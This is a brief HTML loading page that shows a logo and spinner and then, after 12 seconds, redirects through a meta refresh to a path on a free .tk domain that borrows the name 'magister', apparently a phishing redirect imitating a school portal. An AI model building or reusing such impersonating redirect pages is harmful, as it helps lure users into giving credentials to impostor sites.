<html><head><title>Loading...</title>
<meta http-equiv="Refresh" content="12; url=http://magister.extrawebservices.tk/magister/home/g3g3h35qg4hq3hqhgq5hCDVfewgtrwgegrg4/hompage" />
</head><body><center>
  
<style>
.center {
  margin: auto;
  width: 60%;
  padding: 10px;
}
</style>

  <div class="center">
      <img src="logo_1.png" width="250" height="250">
   <br> <img src="loading_icon.gif" width="113" height="113">
  </div>
</div>
<center></body></html>
